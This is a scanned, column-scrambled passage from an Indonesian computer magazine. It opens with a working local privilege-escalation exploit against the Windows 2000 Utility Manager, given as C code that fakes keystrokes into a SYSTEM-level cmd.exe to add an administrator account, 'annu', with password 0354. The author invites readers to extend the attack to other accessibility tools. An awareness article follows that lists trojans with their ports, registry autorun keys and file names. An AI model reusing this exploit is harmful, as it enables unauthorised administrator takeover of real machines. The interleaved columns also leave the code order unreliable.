Proses eksekusi bisa dilakukan di kompiler atau di klik            dieksploitasi oleh program eksploit tersebut. Microsoft
langsung di explorer atau dijalankan lewat cmd.exe                 Narrator secara default dimulai secara otomatis ketika
                                                                   utility manager dibuka.
                                                                   Baris berikut akan memunculkan prompt seperti ini, kare-
                                                                   na sebenarnya file UManDlg.HLP itu tidak ada, yang ada
                                                                   file UManDlg.DLL:
                                                                   PostMessage(lHandle,0x313,0,0); dan SendMessage(lHandle,0x365,0,0x1);
                                                                   Baris berikut mengirimkan pesan Return pada tombol Yes
                                                                   di prompt ini:
                                                                   SendMessage (FindWindow(NULL, lang[i].winhelp),
                                                                   WM_IME_KEYDOWN, VK_RETURN, 0);

                                               Gambar 5. Execute
                                               lewat compiler                                                Gambar 10. Mengirim
                                                                                                             pesan Return

                                                                   Baris berikut memfilter listview agar menampakkan
                                                                   cmd.exe saja:
                                                                   SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)cmd);




Gambar 6. Execute dijalankan di cmd.exe

Jika bahasa yang digunakan oleh user berbeda dengan ba-
hasa yang digunakan oleh system, maka akan muncul
prompt seperti ini :
                                                                                                                    Gambar 11. Filter
                                                                                                                    listview

                                                                   Baris berikut akan memilih cmd.exe dari listview:
                                                                   SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
                                                                   SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
                                                                   SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char


Gambar 7. Select language
System default language adalah bahasa yang digunakan
oleh system windows anda secara keseluruhan, sedang
user default language adalah bahasa yang dipilih oleh
user (Control Panel > Regional Options > General > Your
locale), coba anda pilih 1.                                                                                         Gambar 12.
                                                                                                                    Memilih cmd.exe
                                                                                                                    dari listview

                                                                   Baris berikut akan menampilkan pop up context menu:
                                                                   PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);

                                                                   Baris berikut akan menjalankan 2 panah ke bawah dan
                                                                   mengirimkan sinyal Return (alias menjalankan opsi Open
                                                                   pada pop up context menu):
                                                                   SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
                                                                   SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
                                                                   SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return

Gambar 8. Pilih option 1

                                Coba anda lihat baris:
                                WinExec("utilman.exe
                                /start",SW_HIDE);
                                Baris itu akan membuka
                                utilman.exe
                                                                                                                    Gambar 13.
                                                                                                                    Mengirimkan sinyal
                                Gambar 9. Utilman.exe                                                               Return

                                                                                                     Vol. IV No. 11 NeoTek          37
                    NeoTekno

Baris berikut akan secara otomatis menambahkan user                    SendMessage (lHandle3, WM_IME_KEYDOWN, 0x4E, 0);//n
annu (setingkat administrators) dengan password 0354:                  SendMessage (lHandle3, WM_IME_KEYDOWN, 0x4E, 0);//n
                                                                       SendMessage (lHandle3, WM_IME_KEYDOWN, 0x55, 0);//u
lHandle3 = FindWindow(NULL, "C:\\WINNT\\system32\\cmd.exe");
                                                                       SendMessage (lHandle3, WM_IME_KEYDOWN, 0x20, 0);//space
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x4E, 0);//n
                                                                       SendMessage (lHandle3, WM_IME_KEYDOWN, 0x6F, 0);// /
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x45, 0);//e
                                                                       SendMessage (lHandle3, WM_IME_KEYDOWN, 0x41, 0);//a
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x54, 0);//t
                                                                       SendMessage (lHandle3, WM_IME_KEYDOWN, 0x44, 0);//d
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x20, 0);//space
                                                                       SendMessage (lHandle3, WM_IME_KEYDOWN, 0x44, 0);//d
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x55, 0);//u
                                                                       SendMessage (lHandle3, WM_IME_KEYDOWN, 0x20, 0);//space
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x53, 0);//s
                                                                       SendMessage (lHandle3, WM_IME_KEYDOWN, VK_RETURN, 0); // send return
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x45, 0);//e
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x52, 0);//r
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x20, 0);//space
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x41, 0);//a
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x4E, 0);//n
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x4E, 0);//n
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x55, 0);//u
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x20, 0);//space
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x30, 0);//0
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x33, 0);//3
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x35, 0);//5
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x34, 0);//4
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x20, 0);//space                Gambar 14. User annu dengan password 0354
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x6F, 0);// /
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x41, 0);//a                    Gambar kondisi akhir cmd.exe asal yang kita gunakan
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x44, 0);//d                    tadi untuk mengeksekusi eksploit.
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x44, 0);//d
SendMessage (lHandle3, WM_IME_KEYDOWN, VK_RETURN, 0); // send return
Sleep(5000);
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x4E, 0);//n
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x45, 0);//e
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x54, 0);//t
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x20, 0);//space
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x4C, 0);//l
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x4F, 0);//o
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x43, 0);//c
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x41, 0);//a
                                                                       Gambar 15. Kondisi akhir cmd.exe setelah mengeksekusi exploit
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x4C, 0);//l
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x47, 0);//g
                                                                       Kemungkinan pengembangan eksploit ini adalah ekploi-
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x52, 0);//r
                                                                       tasi pada tiga aplikasi lain yang bisa dijalankan juga oleh
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x4F, 0);//o                    utility manager ini seperti Narrator, Magnifier dan On-
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x55, 0);//u                    Screen Keyboard dan penulis belum sempat mencoba,
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x50, 0);//p                    mungkin anda...
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x20, 0);//space                Sebagai catatan: saat ini penulis menggunakan windows
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x41, 0);//a                    2000 service pack 4, sedang eksploit di-compile dengan
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x44, 0);//d                    Ms. VC++ 6.
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x4D, 0);//m                    Reference:
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x49, 0);//i                    1. Windows SDK HELP
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x4E, 0);//n                    2. www.k-otik.com
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x49, 0);//i                    3. my own valuable brain & logic
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x53, 0);//s                    Send your comments & suggestions to
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x54, 0);//t                    1. iko94@yahoo.com
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x52, 0);//r                    2. www.geocities.com/iko94
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x41, 0);//a                    3. www.neoteker.or.id
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x54, 0);//t
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x4F, 0);//o
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x52, 0);//r
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x53, 0);//s
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x20, 0);//space
SendMessage (lHandle3, WM_IME_KEYDOWN, 0x41, 0);//a

38    NeoTek Vol. IV No. 11
                                                                                              NeoTekno


                                                              COMPUTER SECURITY
                                            Port dan Bahayanya
Perbincangan mengenai port masih sering menghiasi milis-milis komputer, banyak pertanyaan
     yang membutuhkan jawaban. Yocki Supriadi (K_Clown@plasa.com) mengangkat bahasan
   mengenai port demi menambah wawasan kita terhadap port dan bahaya yang memanfaatkan
                                  port sebagai jalan masuk ke dalam sebuah otoritas sistem.

 S
        UDAH BUKAN RAHASIA LAGI BILA BANYAK PROGRAM           1. Port 21, 5400 - 5402
        di internet saat ini yang sangat merugikan peng-      banyak program yang memakai port ini sebagai sarana
        guna komputer awam, banyak penyerang dengan           untuk merusak, contohnya program back construction
sengaja memasukan program yang apabila kita lengah            yang bekerja dengan cara menshare port 21 dan mem-
maka program tersebut bekerja melalui port tertentu.          buat file yang di upload maupun di download tidak terli-
Komputer yang sering kita pakai ternyata memiliki banyak      hat. Beberapa program sejenis biasanya menuliskan diri-
port, yang sebagian besar bahkan kita semua tidak tahu        nya ke registry seperti program back construction ini
kegunaan dari port tersebut. Disini saya akan mencoba         yang menuliskan dirinya ke
memberi beberapa contoh port mana saja yang sering di-        HKEY_USERS\Default\Software\Microsoft\Windows\CurrentVersion\Run\
pakai untuk menyusup bersama dengan contoh program            (Key: Shell). Contoh program lain yang memakai port 21
yang memakai port tersebut.                                   ini sebagai sarananya adalah Blade Runner, Fore, Invisible
Program hacking biasanya dibuat untuk memasukan back-         Ftp, Larva, WebEx, WinCrash dll.
door, atau lubang secara sengaja dengan melewati sistem       2. Port 23
keamanan dari target, agar program tersebut tidak terlihat
sebagai sebuah ancaman oleh target, dan penyerang bisa        Port ini biasanya digunakan untuk login jarak jauh ke
melakukan manipulasi program tersebut untuk tujuan            komputer lain dengan menggunakan telnet. Ada bebera-
tertentu. Software yang menjadi contoh dibawah ini bisa       pa program yang menggunakan port ini sebagai jalan un-
dibagi menjadi 3 bagian yaitu virus, worms, dan Trojan.       tuk masuk seperti Tiny Telnet Server yang berjalan pada
                                                              system yang sudah terinfeksi secara diam-diam. Program
Virus: suatu program komputer yang bisa menggandakan          ini juga menuliskan dirinya ke dalam registry, yang dapat
dirinya dengan menggunakan atau membutuhkan host              ditemukan di
program.                                                      HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
Worm: Worm tidak seperti virus, dia bisa menggandakan         n\Run Windll.exe = "C:\\WINDOWS\\Windll.exe".
dirinya tanpa bantuan dari host program. Sekali terekse-      3. Port 25, 110
kusi maka worm akan meng-compile dan menyebarkan
dirinya sendiri secara masal.                                 Port ini digunakan untuk pentransferan pesan sederhana,
                                                              banyak program - program yang sering beraksi melalui
Trojan: suatu program yang berisi kode yang merusak           port ini seperti Antigen yang berusaha menipu korban-
dibalik tampilan maupun kegunaan yang terlihat normal.        nya dengan mengirim pesan berupa joke, yang ketika di-
Program dan port yang dilewati dibawah ini biasanya tidak     buka oleh korban maka program ini akan memasukan
diberitahu kepada korban, setelah mengirimkan beberapa        keylogging, Dos control, atau remote backdoor. Program
file kepada beberapa korban maka si penyerang tinggal         ini biasanya sering mengubah nama filenya menjadi be-
menggunakan scan dan mencari korban yang aktif, bila          berapa nama dan sering menyamarkan ikon. Contoh lain
penyerang menemukan korban yang aktif maka kendali            program yang menyerang melalui mail antara lain yaitu
sudah di tangan dia. Tanpa tunggu lebih lama, mari kita       tapiras, WinPC, Shtrilitz, Ajan, Haebu Coceda, Happy99,
lihat beberapa program jahat beserta port yang dilewatinya.   Kuang2, Terminator, ProMail Trojan dll.




                                                                                                               Gambar 2.
                                                                                                               Deep Throat
                                                                                                               Remote
Gambar 1. Blade Runner

                                                                                              Vol. IV No. 11 NeoTek          39
                    NeoTekno

4. Port 41, 999, 2140, 3150, 6670-6671, 60000                       untuk upload maupun download secara tersembunyi me-
Contoh program yang memakai port ini adalah Deep                    lalui port 666, program ini dalam registry tertulis pada
Throat dan pernah di bahas pada Neotek edisi beberapa               HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
waktu lalu. Program ini memiliki banyak feature terma-              (Key: Reminder). Program Cain dibuat untuk mencuri
suk mode "siluman" untuk server FTP agar bisa meng-                 password, sementara Abel adalah sebuah remote server
upload, dowload dan menghapus file, pilihan lainnya ada-            yang digunakan untuk melakukan transfer file secara ter-
lah mengijinkan penyerang untuk melihat layar, mengam-              sembunyi, file yang perlu diwaspadai adalah abel.exe.
bil password, membuka web browser, restart sistem, bah-             Program seperti Satanz Backdoor, dan ServeU dikenal se-
kan mengontrol program yang sedang berjalan. Program                bagai remote akses tersembunyi cukup berbahaya yang
ini menuliskan dirinya pada registry                                memerlukan resource system yang cukup kecil.
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\   10. Port 1010 - 1015
(Key: SystemTray)                                                   Doly Trojan digunakan untuk mendapatkan remote terha-
5.Port 80                                                           dap target secara komplit, program ini berbahaya dan se-
Program Executor menggunakan port 80 sebagai jalan un-              ring menggunakan port yang berbeda untuk menyerang,
tuk masuk ke dalam komputer. Program ini adalah salah               beberapa berita meyatakan bahwa filenamenya bisa di
satu program remote yang berbahaya, bisa menghapus                  modifikasi. Registry key program ini mungkin berada di
                                                                    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
file system atau setting suatu komputer, biasanya terins-
tal dengan nama sexec.exe dan menuliskan dirinya di                 untuk file tesk.exe.
registry pada
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
n\Run\ <>Executer1="C:\windows\sexec.exe"
6. Port 113
Kazimas yang merupakan IRC worm menggunakan port
ini, bekerja agar apabila mIRC sudah terkoneksi dengan
server segera masuk ke channel tertentu, filenya bernama
milbug_a.exe dan besarnya 10 kb. Kazimas meng-copy
dirinya ke beberapa direktori seperti
C:\WINDOWS\KAZIMAS.EXE
C:\WINDOWS\SYSTEM\PSYS.EXE
C:\MIRC\DOWNLOAD\MIRC60.EXE
C:\MIRC\LOGS\LOGGING.EXE
7. Port 531, 1045
                                                                                                                      Gambar 4.
Virus Rasmin, yang dibuat dengan Visual C++ menggu-                                                                   Doly Trojan
nakan port 531, banyak yang bilang virus ini dibuat untuk
menjalankan perintah yang spesifik dari pembuatnya.                 11. Port 1042
Program ini bersembunyi dengan beberapa nama antara                 BLA yang merupakan program remote control memakai
lain RASMIN.EXE, WSPOOL.EXE, INIPX.EXE,                             port ini, BLA memiliki fasilitas antara lain untuk mengi-
UPGRADE.EXE, WINSRVC.EXE.                                           rim ICMP echo dan me-restart target. Program ini menu-
8. Port 555, 9989                                                   liskan dirinya pada
                                                                    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
Phase Zero menggunakan port ini untuk melakukan aksi-
                                                                    n\Run\ System = "C:\WINDOWS\System\mprdll.exe" dan
nya, tujuan utama dari Trojan ini adalah untuk merusak
                                                                    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
system dari target. Program ini baru bisa merusak bila
                                                                    n\Run\ SystemDoor = "C:\WINDOWS\System\rundll argp1". File
setup program dieksekusi dari komputer host bersangku-
tan. Dalam registry program ini tertulis pada                       yang perlu diwaspadai adalah mprdll.exe.
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\   12. Port 1234
(Key: MsgServ)                                                      Contoh program yang menggunakan port ini adalah Ultors
                                                                    Trojan, merupakan program telnet lain yang di desain
                                                                    agar kita bisa melakukan execute command atau shell
                                                                    command secara remote, untuk melihat proses yang se-
                                                                    dang berjalan atau mematikan/restart system target. Saat
                                                                    ini beberapa feature telah ditambahkan seperti fasilitas
                                                                    untuk mengirim pesan dan menampilkan pesan error.
                                                                    13. Port 1243, 6776
                                                                    BackDoor-G yang merupakan variasi dari program sub-
                                                                    seven menggunakan port ini. Setelah terinfeksi, program
Gambar 3. Phase Zero                                                ini akan memberikan akses tak terbatas dari sistem target
                                                                    kepada penyerang melalui internet. Program ini memiliki
9.Port 666                                                          banyak feature, dan biasanya disusupkan melalui attach-
                                                                    ment email. Software ini biasanya berada pada beberapa
Beberapa program yang melewati port ini antara lain                 tempat seperti
Attack FTP, Cain and Abel, Satanz Backdoor, dan ServeU.
Attack FTP membuat sebuah server ftp yang full permission           \WINDOWS\NODLL.EXE


40    NeoTek Vol. IV No. 11
                                                                                                     NeoTekno
\WINDOWS\SERVER.EXE atau KERNEL16.DLL atau WINDOW.EXE               (Key: SysWindow )
WINDOWS\SYSTEM\WATCHING.DLL atau LMDRK_33.DLL
                                                                    20. Port 2115
Contoh lain yang menggunakan port ini adalah
SubSevenApocalypse.                                                 Bugs yang merupakan program remote akses sederhana
                                                                    menggunakan port ini, memiliki feature seperti manaje-
14. Port 1245                                                       men file, serta mengontrol window melalui GUI yang ter-
program yang menggunakan port ini salah satunya ada-                batas. Pada registry berada di
lah VooDoo Doll. Program ini pada awalnya memiliki                  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
feature remote control yang terbatas, nama program ini              (Key: SysTray )
diambil dari komunitas underground yang menyebarkan                 21. port 2140, 3150
software tersebut. VooDoo Doll bisa menimbulkan keru-
sakan seperti mengcopy file target berkali-kali, pada be-           The Invasor yaitu program remote akses dengan feature
berapa kasus bisa membuat file sistem menjadi rusak.                seperti pesan, kontrol suara, format, dan screen capture
                                                                    merupakan contoh program yang menggunakan port ini.
15. Port 1492                                                       Dalam registry bisa ditemukan
FTP99CMP adalah contoh lain dari program ftp server                 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
yang menggunakan port ini. Program ini menuliskan                   (Key: SystemDLL32)
dirinya pada Registry Key seperti                                   22. Port 2155, 5512
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
(Key: WinDLL_16)                                                    Illusion Mailer yang merupakan email spammmer yang
                                                                    membuat si penyerang seakan-akan korban dan mengi-
16. Port 1981                                                       rim email dari komputer target, yang muncul pada e-mail
Shockrave yang merupakan program remote control meng-               header adalah IP Address target dimana sebenarnya yang
gunakan port ini. Dalam Registry dapat ditemukan pada               mengirim pesan adalah si penyerang. Dalam registry
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio         program ini mencatat dirinya pada
n\RunServices\ (Key: NetworkPopup). Program yang perlu              HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
diwaspadai adalah netpopup.exe.                                     (Key: Sysmem)
17. Port 1999                                                       23. Port 2565
Sebagai remote backdoor Trojan yang pertama BackDoor                Striker yang apabila di eksekusi, tujuan utamanya adalah
sudah tersebar ke segala penjuru dunia. Dibuat menggu-              menghancurkan windows, program ini akan menghilang
nakan Visual Basic, program ini cukup banyak featurenya             setelah sistem di restart. File yang perlu diwaspadai
seperti:                                                            adalah servers.exe
- kontrol cd-rom                                                    24. Port 2600
- kontrol Ctrl-Alt-Del                                              Backdoor remote akses Trojan yang bernama Digital
- pesan                                                             RootBeer menggunakan port ini. Beberapa feature yang
- chat                                                              dimilikinya adalah:
- manajemen file
- control mouse                                                     - pesan
                                                                    - kontrol monitor
Selama configurasi, Registry Keynya terdapat pada                   - chat
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\   - kontrol audio
(Key: notpa) program yang perlu diwaspadai adalah notpa.exe.
                                                                    dalam registry bisa ditemukan pada
18. Port 1999-2005, 9878                                            HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
Remote control Trojan yang berasal dari Jerman dan ber-             (Key:ActiveXConsole)
nama Transmission Scout memiliki banyak feature-                    25. Port 2989
feature yang cukup berbahaya. Program ini dalam registry
dapat ditemukan pada                                                RAT merupakan salah satu dari remote akses backdoor
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
                                                                    trojan yang berbahaya. RAT di buat untu merusak hard
(Key: kernel16).                                                    disk. Program ini dalam registry bisa dilihat pada
19. Port 2001                                                       HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
                                                                    n\Run\ Explorer = "C:\WINDOW\system\MSGSRV16.exe
Trojan Cow yang merupakan contoh lain remote backdoor
Trojan memakai port ini. TrojanCow memiliki banyak                  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
feature seperti:                                                    n\RunServices\Default=" "
                                                                    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
- membuka/menutup CD-ROM
                                                                    n\RunServices\ Explorer=" "
- menghilangkan desktop icon
- menghilangkan tombol start                                        26. Port 3459-3801
- menghilangkan system tray                                         Trojan Eclipse pada dasarnya adalah salah satu program
- menghilangkan penunjuk waktu                                      FTP yang berjalan secara tersembunyi. Apabila program
- merubah background                                                ini tereksekusi, maka penyerang memiliki hak penuh atas
- menghapus file                                                    akses FTP ke seluruh file termasuk file exe, menghapus,
- mematikan/restart PC target                                       membaca, dan merubahnya. Eclipse menuliskan dirinya
- log off windows                                                   pada registry, yang terdapat di
selama configurasi, Registry Keynya bisa ditemukan pada             HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run    n\Run\ Rnaapp="C:\WINDOWS\SYSTEM (Key: rmaapp)". File


                                                                                                    Vol. IV No. 11 NeoTek         41
                  NeoTekno

yang perlu diwaspadai adalah rmaapp.exe                          dicompile oleh MS Visual C++. File yang dieksekusi
27. Port 3700, 9872-9875, 10067, 10167                           adalah qazwsx.hsq. Dalam registry, bisa kita lihat pada
                                                                 HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Portal of Doom yang merupakan salah satu Trojan remote           "StartIE"="C:\WINDOWS\NOTEPAD.EXE qazwsx.hsq".
control yang popular menggunakan salah satu port ini.            File yang perlu diwaspadai adalah notepad.exe (setelah
Program ini memiliki feature seperti kontrol CDROM,              mengapus file ini, kemudian rename note.exe menjadi
kontrol audio, file explorer, kontrol taskbar, keylogger, dll.   notepad.exe).
Untuk melihat registry keynya, bisa di temukan pada
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
                                                                 36. Port 10101
n\RunServices\ (Key: String).                                    BrainSpy adalah Trojan remote kontrol yang memiliki
28. Port 4567                                                    feature seperti Trojan sejenisnya. Trojan ini memiliki
                                                                 kemampuan untuk menghapus daftar virus yang telah di
File Nail adalah salah satu ICQ backdoor, yang menim-            scan. Pada registry bisa dilihat di beberapa tempat seperti:
bulkan keresahan pada komunitas ICQ.
                                                                 HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices - Dualji
29. Port 5000
                                                                 HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices - Gbubuzhnw
Bubbel adalah remote backdoor Trojan yang mengguna-
                                                                 HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices - Fexhqcux
kan port ini, dengan feature yang hampir sama dengan
Trojan Cow terbaru termasuk mengirim pesan, kontrol              37. Port 10520
monitor, kontrol modem, kontrol audio, dll.                      Acid Shivers, merupakan Trojan remote kontrol yang me-
30. Port 5001, 30303, 50505                                      lalui service telnet untuk mengeksekusi command dan
Sockets de Troie adalah virus yang penyebarannya diban-          memiliki kemampuan untuk mengirim pesan pada penye-
tu oleh backdoor remote administration. Apabila sudah            rang bila sistem target telah aktif. File yang perlu
tereksekusi, virus ini menampilkan DLL error yang seder-         diwaspadai adalah en-cid12.exe, en-cid12.dat
hana lalu mengcopy dirinya pada directory Windows\System
dengan nama MSCHV32.EXE dan memodifikasi windows
registry. Biasanya virus ini bisa dilihat pada registry
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrenVersion\
RunLoadMSchv32Drv =C:\WINDOWS\SYSTEM\MSchv32.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrenVersion\
RunLoadMgadeskdll = C:\WINDOWS\SYSTEM\Mgadeskdll.exe
31. Port 5151
Contoh program yang memakai port ini adalah Optix yang
                                                                 Gambar 5. Acid Shivers
merupakan remote akses trojan dan di-compile dengan
Borland Delphi 5. feature yang terdapat di program ini
antara lain merestart sistem, upload file, melihat proses        38. Port 12223
yang sedang berjalan, mematikan proses dll. File yang            keylogger seperti Hack'99 meggunakan port ini, seperti
harus diwaspadai adalah semua file Backdoor.optix                keylogger lainnya, program ini bisa mengirimkan hasil
termasuk Winstart.bat                                            ketikan korban secara real-time (apabila tersambung
32. Port 5569                                                    dengan internet tentunya).
Robo-Hack yang merupakan remote akses backdoor lama              39. Port 18000
dan ditulis menggunakan Visual Basic menggunakan port            Service Pro adalah salah satu remote backdoor Trojan
ini. Program ini tidak menyebarkan dirinya, dan memi-            dengan kemampuan seperti menghapus file, menjalankan
liki beberapa feature dasar seperti sistem monitoring, edit      program, shutdown dan restart PC korban, log off
file, restart/matikan sistem, kontrol CDROM. File yang           windows dll. Pada registry bisa dilihat di
perlu diwaspadai adalah robo-serv.exe                            HKLM\Software\Microsoft\Windows\CurrentVersion\Run - Srvcpro
33. Port 6969, 16969                                             40. Port 20000 - 20001
Priority adalah program remote kontrol yang dibuat oleh          Program remoe kontrol yang bernama Millenium
Visul Basic dan memiliki banyak feature seperti kontrol          menggunakan port ini, dibuat dengan Visual Basic,
CDROM, kontrol audio, file explorer, kontrol taskbar,            program ini memiliki kemampuan seperti kontrol cdrom,
kontrol desktop, shutdown/restart sistem, port scanning          kontrol audio, keylogger, kontrol taskbar dan desktop,
dll. Pada registry bisa kita lihat di                            port scanning dll. Pada registri bisa kita lihat di
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio      HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
n\RunServices\ (Key : Pserver).                                  (Key: Millenium). File yang perlu diwaspadai adalah hool.exe
34. Port 7000                                                    41. Port 22222, 33333
Remote Grab menggunakan port ini. Program yang ber-              Prosiak merupakan program remote kontrol dengan ke-
laku seperti penangkap layar ini dibuat untuk remote             mampuan seperti kontrol cdrom, kontrol audio, kontrol
spying, dalam konfigurasi, file ini mengcopy dirinya ke          desktop dll. Kita bisa lihat registry keynya di
C:\WINDOWS\System\mprexe.exe                                     HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
35. Port 7597                                                    (Key: Microsoft DLL Loader). File yangperlu diwaspadai
                                                                 adalah prosiak.exe.
RAT.QAZ, W32.QAZ.Worm, HLLW.QAZ, QAZ Trojan
menggunakan port ini. Merupakan remote akses yang                42. Port 30029


42   NeoTek Vol. IV No. 11
                                                                                                   NeoTekno

salah satu program yang memakai port ini adalah AOL                 47. Port 40412
Trojan. Trojan ini menginfeksi DOS.EXE, dan bisa me-                Keylogger The Spy menggunakan port ini. Program ini
nyebarkan dirinya melali LAN, WAN, INTERNET, atau                   hanya bisa mengirimkan hasilnya secara langsung, tidak
melalui email. Pada registry bisa dilihat di                        bisa menyimpannya dulu bila target sedang dalam keada-
HKLM\Software\Microsoft\Windows\CurrentVersion\Run                  an off line. Pada registry bisa kita lihat di
(Key: dat92003).                                                    HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
                                                                    (Key : systray)
                                                                    48. Port 47262
                                                                    Program Delta Source terinspirasi dari Back Orifice, dibuat
                                                                    menggunakan Visual Basic. Sebagai hasilnya semua
                                                                    feature dari program ini sama seperti feature yang ada
                                                                    pada BO. Dalam registry bisa kita lihat pada
                                                                    HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
                                                                    (Key: Ds admin tool)




Gambar 6. Millenium

43. Port 30100 - 30102
NetSphere yang merupakan program remote yang
powerfull dan berbahaya menggunakan port ini. Feature
yang ada pada Trojan ini antara lain shutdown/restart
sistem, kontrol audio, melihat informasi sistem target
secara komplit, kontrol mouse, chat dll. Dalam registry                                                       Gambar 8. Delta
bisa kita lihat di
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices - nssx   49. Port 65000
44. Port 1349, 31337 - 31338, 54320 - 54321                         Devil merupakan program remote kontrol yang dibuat
                                                                    dengan Visual Basic. Software ini tidak akan aktif kembai
Back Orifice program remote yang terkenal dan sudah                 bila sistem target telah di restart. Beberapa feature yang
menyebar luas menggunakan port ini. BO mengendalikan                ada antara lain kontrol sdrom, dan mematikan aplikasi.
nyaris sepenuhnya terhadap sistem, termasuk restart                 File yang perlu diwaspadai adalah opscript.exe,
sistem serta mengirim dan menerima file.                            winamp34.exe, wingenocid.exe.
                                                                    50. Port 6400
                                                                    The thing adalah program yang dibuat untuk meng-upload
                                                                    dan engeksekusi suatu program secara remote. Dalam
                                                                    registry bisa kita lihat pada
                                                                    HKLM\Software\Microsoft\Windows\CurrentVersion\Run
                                                                    (Key: Default)
                                                                    51. Port 119
                                                                    Happy 99 sebenarnya sebuah program yang menampil-
                                                                    kan gambar kembang api yang indah, tetapi di belakang
                                                                    layar, dia mengirimkan keylogger, DoS control dll.
                                                                    52. Port 27374
                                         Gambar 7. BackOrifice      SubSeven Apocalypse menggunakan port ini, merupakan
                                                                    program Trojan yang tidak kalah terkenalnya dengan
45. Port 33911                                                      Back Orifice. Feature yang terdapat di program ini antara
Spirit, yang kita kenal sebagai remote backdoor dengan              lain bisa mengendalikan mouse, spy ICQ, membuka web
